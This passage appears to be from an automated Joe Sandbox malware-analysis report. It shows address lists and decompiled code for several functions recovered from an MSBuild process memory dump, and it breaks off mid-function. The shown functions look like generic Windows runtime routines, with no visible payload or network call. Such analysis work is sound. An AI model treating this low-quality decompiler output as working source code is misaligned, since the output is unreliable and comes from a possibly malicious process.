                                                                                                0x01117a5b
                                                                                                0x01117a5c
                                                                                                0x01117a5d
                                                                                                0x01117a63
                                                                                                0x01117a64
                                                                                                0x01117a6a
                                                                                                0x01117a6c
                                                                                                0x01117a6e
                                                                                                0x011179cb
                                                                                                0x011179cb
                                                                                                0x011179ce
                                                                                                0x011179d0
                                                                                                0x01117a98
                                                                                                0x01117a9b
                                                                                                0x01117a9b
                                                                                                0x01117a9e
                                                                                                0x01117aa1
                                                                                                0x01117bbe
                                                                                                0x01117bbe
                                                                                                0x01117bc0
                                                                                                0x01117be0
                                                                                                0x01117be0
                                                                                                0x01117a01
                                                                                                0x01117a01
                                                                                                0x01117a05
                                                                                                0x01117a07
                                                                                                0x01117a15
                                                                                                0x01117a15
                                                                                                0x01117a1a
                                                                                                0x00000000
                                                                                                0x01117a1a
                                                                                                0x01117bc2
                                                                                                0x01117bc6
                                                                                                0x01117bc9
                                                                                                0x01117bcd
                                                                                                0x01117bcf
                                                                                                0x011179e6
                                                                                                0x011179e6
                                                                                                0x011179eb
                                                                                                0x011179eb
                                                                                                0x011179ef
                                                                                                0x011179f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011179f3
                                                                                                0x011179f5
                                                                                                0x011179ff
                                                                                                0x011179ff
                                                                                                0x00000000
                                                                                                0x011179ff
                                                                                                0x011179f7
                                                                                                0x011179fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011179fd
                                                                                                0x01117bd5
                                                                                                0x01117bd8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117ba9
                                                                                                0x01117bac
                                                                                                0x01117bb0
                                                                                                0x01117bb1
                                                                                                0x01117bb1
                                                                                                0x01117bb6
                                                                                                0x00000000
                                                                                                0x01117bb6
                                                                                                0x01117aa7
                                                                                                0x01117aaa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117ab2
                                                                                                0x01117ab3
                                                                                                0x01117ab5
                                                                                                0x01117aec
                                                                                                0x01117aef
                                                                                                0x01117b25
                                                                                                0x01117b28
                                                                                                0x01117b62
                                                                                                0x01117b64
                                                                                                0x01117b8f
                                                                                                0x01117b92
                                                                                                0x01117b96
                                                                                                0x01117b98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117b9e
                                                                                                0x01117b9f
                                                                                                0x01117ba3
                                                                                                0x00000000
                                                                                                0x01117ba3
                                                                                                0x01117b66
                                                                                                0x01117b68
                                                                                                0x01117ae2
                                                                                                0x01117ae2
                                                                                                0x00000000
                                                                                                0x01117ae2
                                                                                                0x01117b6e
                                                                                                0x01117b72
                                                                                                0x01117b75
                                                                                                0x01117b81
                                                                                                0x01117b85
                                                                                                0x01117b87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117b31
                                                                                                0x01117b34
                                                                                                0x01117b3c
                                                                                                0x01117b45
                                                                                                0x01117b46
                                                                                                0x01117b4f
                                                                                                0x01117b51
                                                                                                0x01117b57
                                                                                                0x01117b59
                                                                                                0x01117b59
                                                                                                0x00000000
                                                                                                0x01117b59
                                                                                                0x01117b77
                                                                                                0x00000000
                                                                                                0x01117b77
                                                                                                0x01117b2a
                                                                                                0x00000000
                                                                                                0x01117b2a
                                                                                                0x01117af1
                                                                                                0x01117af3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117afb
                                                                                                0x01117afc
                                                                                                0x01117afe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117b00
                                                                                                0x01117b03
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117b05
                                                                                                0x01117b09
                                                                                                0x01117b0d
                                                                                                0x01117b0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117b18
                                                                                                0x01117b1d
                                                                                                0x00000000
                                                                                                0x01117b1d
                                                                                                0x01117ab7
                                                                                                0x01117ab9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117abf
                                                                                                0x01117ac1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117ac3
                                                                                                0x01117ac6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117ac8
                                                                                                0x01117acc
                                                                                                0x01117ad0
                                                                                                0x01117ad2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117adb
                                                                                                0x00000000
                                                                                                0x01117adb
                                                                                                0x011179d6
                                                                                                0x011179d9
                                                                                                0x011179dc
                                                                                                0x01117a91
                                                                                                0x01117a94
                                                                                                0x00000000
                                                                                                0x01117a94
                                                                                                0x011179e2
                                                                                                0x00000000
                                                                                                0x011179e2
                                                                                                0x01117a74
                                                                                                0x01117a7a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117a8a
                                                                                                0x01117a21
                                                                                                0x01117a21
                                                                                                0x00000000
                                                                                                0x01117a21
                                                                                                0x010ac650
                                                                                                0x010ac651
                                                                                                0x010ac656
                                                                                                0x010ac65c
                                                                                                0x010ac65d
                                                                                                0x010ac663
                                                                                                0x010ac664
                                                                                                0x010ac66a
                                                                                                0x010ac66e
                                                                                                0x011179c5
                                                                                                0x011179c7
                                                                                                0x00000000
                                                                                                0x011179c7
                                                                                                0x010ac67a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 39c529f1abc593d396b460b9af8444bfcb894156fc0357265851fd0923a4c036
                                                                                                • Instruction ID: 6bdcc7470d524afe58b2c8aefcb10e831b9f8868b1636c6b36db80a1b9c08f6c
                                                                                                • Opcode Fuzzy Hash: 39c529f1abc593d396b460b9af8444bfcb894156fc0357265851fd0923a4c036
                                                                                                • Instruction Fuzzy Hash: 4E81A7766042158FDB2ACE58C480A7AF7E5FB84350F19483DEE459B389D730ED44CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0113B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 39%
                                                                                                			E0113B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1197b9c; // 0x0
				_t124 = L010C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E010E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E010E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E010E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L010C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E010E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E010E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1197b9c; // 0x0
									_t92 = L010C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E010E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E010AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0113E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0113E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E010E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                0x0113b8d9
                                                                                                0x0113b8e4
                                                                                                0x00000000
                                                                                                0x0113b8e6
                                                                                                0x0113b8f3
                                                                                                0x0113b8f5
                                                                                                0x0113b8f5
                                                                                                0x0113b8f8
                                                                                                0x0113b920
                                                                                                0x0113b924
                                                                                                0x0113b936
                                                                                                0x0113b939
                                                                                                0x0113b93d
                                                                                                0x0113b948
                                                                                                0x0113b9a0
                                                                                                0x0113b9a0
                                                                                                0x0113b9a4
                                                                                                0x0113b9bf
                                                                                                0x0113b9c4
                                                                                                0x0113b9c6
                                                                                                0x0113b9cd
                                                                                                0x0113b9d1
                                                                                                0x0113bad4
                                                                                                0x0113bad8
                                                                                                0x0113bada
                                                                                                0x0113badc
                                                                                                0x0113badc
                                                                                                0x0113badf
                                                                                                0x0113bae0
                                                                                                0x0113bae2
                                                                                                0x0113bae4
                                                                                                0x0113baec
                                                                                                0x0113baee
                                                                                                0x0113baf0
                                                                                                0x0113baf0
                                                                                                0x0113baec
                                                                                                0x0113bafb
                                                                                                0x0113bafc
                                                                                                0x0113bafe
                                                                                                0x0113bb01
                                                                                                0x0113bb01
                                                                                                0x00000000
                                                                                                0x0113bb06
                                                                                                0x0113b9d7
                                                                                                0x0113b9db
                                                                                                0x0113b9db
                                                                                                0x0113b9de
                                                                                                0x0113b9de
                                                                                                0x0113b9e4
                                                                                                0x0113b9e7
                                                                                                0x0113b9ea
                                                                                                0x0113b9ec
                                                                                                0x0113b9ef
                                                                                                0x0113b9f3
                                                                                                0x0113ba1b
                                                                                                0x0113ba1b
                                                                                                0x0113ba23
                                                                                                0x0113ba24
                                                                                                0x0113ba27
                                                                                                0x0113ba2a
                                                                                                0x0113ba2b
                                                                                                0x0113ba2e
                                                                                                0x0113ba30
                                                                                                0x0113ba37
                                                                                                0x0113ba3f
                                                                                                0x0113ba9c
                                                                                                0x0113baa2
                                                                                                0x0113bb13
                                                                                                0x0113bb15
                                                                                                0x0113baae
                                                                                                0x0113baae
                                                                                                0x0113bab3
                                                                                                0x0113bab5
                                                                                                0x0113baba
                                                                                                0x0113bac8
                                                                                                0x0113bac8
                                                                                                0x0113baba
                                                                                                0x0113bacd
                                                                                                0x0113bacf
                                                                                                0x00000000
                                                                                                0x0113bacf
                                                                                                0x0113bb1a
                                                                                                0x00000000
                                                                                                0x0113bb1c
                                                                                                0x0113baa7
                                                                                                0x0113bb11
                                                                                                0x00000000
                                                                                                0x0113bb11
                                                                                                0x0113baa9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0113ba41
                                                                                                0x0113ba41
                                                                                                0x0113ba41
                                                                                                0x0113ba58
                                                                                                0x0113ba5d
                                                                                                0x0113ba62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0113ba64
                                                                                                0x0113ba67
                                                                                                0x0113ba68
                                                                                                0x0113ba69
                                                                                                0x0113ba6c
                                                                                                0x0113ba6f
                                                                                                0x0113ba71
                                                                                                0x0113ba78
                                                                                                0x0113ba80
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0113ba90
                                                                                                0x0113ba90
                                                                                                0x0113ba97
                                                                                                0x00000000
                                                                                                0x0113ba97
                                                                                                0x0113b9f5
                                                                                                0x0113b9f7
                                                                                                0x0113b9f7
                                                                                                0x0113b9fa
                                                                                                0x0113ba03
                                                                                                0x0113ba07
                                                                                                0x0113ba0c
                                                                                                0x0113ba10
                                                                                                0x0113ba17
                                                                                                0x00000000
                                                                                                0x0113b9f7
                                                                                                0x0113b9a6
                                                                                                0x0113b9a8
                                                                                                0x0113b9af
                                                                                                0x0113b9b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0113b9b9
                                                                                                0x00000000
                                                                                                0x0113b9b9
                                                                                                0x0113b94d
                                                                                                0x0113b98f
                                                                                                0x0113b995
                                                                                                0x0113b999
                                                                                                0x0113b960
                                                                                                0x0113b967
                                                                                                0x0113b968
                                                                                                0x0113b96a
                                                                                                0x00000000
                                                                                                0x0113b96a
                                                                                                0x0113b99b
                                                                                                0x0113b99e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0113b99e
                                                                                                0x0113b951
                                                                                                0x0113b954
                                                                                                0x0113b95a
                                                                                                0x0113b95e
                                                                                                0x0113b972
                                                                                                0x0113b979
                                                                                                0x0113b97d
                                                                                                0x0113b97f
                                                                                                0x0113b980
                                                                                                0x0113b982
                                                                                                0x0113b984
                                                                                                0x00000000
                                                                                                0x0113b984
                                                                                                0x00000000
                                                                                                0x0113b926
                                                                                                0x00000000
                                                                                                0x0113b926

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8cc6e11a65a831126b4349377be8b0283eca5566bd84a89bef1236e471679fd3
                                                                                                • Instruction ID: 784888acdda789088e8b69379f878252a8a5c2c1f698d596af74c75199bd4be9
                                                                                                • Opcode Fuzzy Hash: 8cc6e11a65a831126b4349377be8b0283eca5566bd84a89bef1236e471679fd3
                                                                                                • Instruction Fuzzy Hash: 1A712272204B02EFE73ACF19C844F96BBE5EF80720F114528E695872A8FB71E945CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01126DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E01126DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01126B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E010C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E010E9AE0();
					_t87 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0112795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0112795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0112795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0112795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L010C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01126B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01126B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01126B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01126B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E010C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E010E9AE0();
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L010C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L010C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L010C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L010C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                0x01126dd4
                                                                                                0x01126dde
                                                                                                0x01126de1
                                                                                                0x01126de3
                                                                                                0x01126de6
                                                                                                0x01126de9
                                                                                                0x01126dec
                                                                                                0x01126def
                                                                                                0x01126df2
                                                                                                0x01126df5
                                                                                                0x01126dfe
                                                                                                0x01126e04
                                                                                                0x01126e09
                                                                                                0x01126e0d
                                                                                                0x01126e18
                                                                                                0x01126e1b
                                                                                                0x01126e22
                                                                                                0x01126e2d
                                                                                                0x01126e30
                                                                                                0x01126e36
                                                                                                0x01126e42
                                                                                                0x01126e4d
                                                                                                0x01126e50
                                                                                                0x01126e55
                                                                                                0x01126e5c
                                                                                                0x01126e6e
                                                                                                0x01126e5e
                                                                                                0x01126e67
                                                                                                0x01126e67
                                                                                                0x01126e73
                                                                                                0x01126e74
                                                                                                0x01126e77
                                                                                                0x01126e7c
                                                                                                0x01126e7d
                                                                                                0x01126e8e
                                                                                                0x01126e93
                                                                                                0x01126e9c
                                                                                                0x01126ea8
                                                                                                0x01126eab
                                                                                                0x01126eac
                                                                                                0x01126eb3
                                                                                                0x01126ecd
                                                                                                0x01126edc
                                                                                                0x01126ee2
                                                                                                0x01126ee5
                                                                                                0x01126ef2
                                                                                                0x01126efb
                                                                                                0x01126f01
                                                                                                0x01126f06
                                                                                                0x01126f0b
                                                                                                0x01126f11
                                                                                                0x01126f1a
                                                                                                0x01126f22
                                                                                                0x01126f26
                                                                                                0x01126f26
                                                                                                0x01126f33
                                                                                                0x01126f41
                                                                                                0x01126f44
                                                                                                0x01126f47
                                                                                                0x01126f54
                                                                                                0x01126f65
                                                                                                0x01126f77
                                                                                                0x01126f7c
                                                                                                0x01126f82
                                                                                                0x01126f91
                                                                                                0x01126f99
                                                                                                0x01126fa3
                                                                                                0x01126fae
                                                                                                0x01126fae
                                                                                                0x01126fba
                                                                                                0x01126fbb
                                                                                                0x01126fbc
                                                                                                0x01126fc1
                                                                                                0x01126fc2
                                                                                                0x01126fd3
                                                                                                0x01126fd8
                                                                                                0x01126fd8
                                                                                                0x01126fdf
                                                                                                0x01126fe8
                                                                                                0x01126fee
                                                                                                0x01126fee
                                                                                                0x01126ff5
                                                                                                0x01126ffb
                                                                                                0x01126ffb
                                                                                                0x01127004
                                                                                                0x00000000
                                                                                                0x0112700a
                                                                                                0x01127004
                                                                                                0x01126eb3
                                                                                                0x01126e9c
                                                                                                0x01127015

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction ID: b986489bcab33228af15b200afb02792884f8c9e31ba033d0785ae867ae32b14
                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction Fuzzy Hash: AC718F71A00219EFCB15DFA9C984EEEBBB9FF58714F104069E905E7290DB34EA51CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A52A5 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E010A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E010BEEF0(0x11979a0);
					_t104 =  *0x1198210; // 0xc52cb8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E010BEB70(_t93, 0x11979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E010E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E010BEEF0(0x11979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E010BEB70(0, 0x11979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xc52cc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E010DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E010BEEF0(0x11979a0);
									__eflags =  *0x1198210 - _t104; // 0xc52cb8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1198210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01124888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E010BEB70(_t95, 0x11979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010E95D0();
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010E95D0();
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E010BEB70(_t93, 0x11979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E010DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
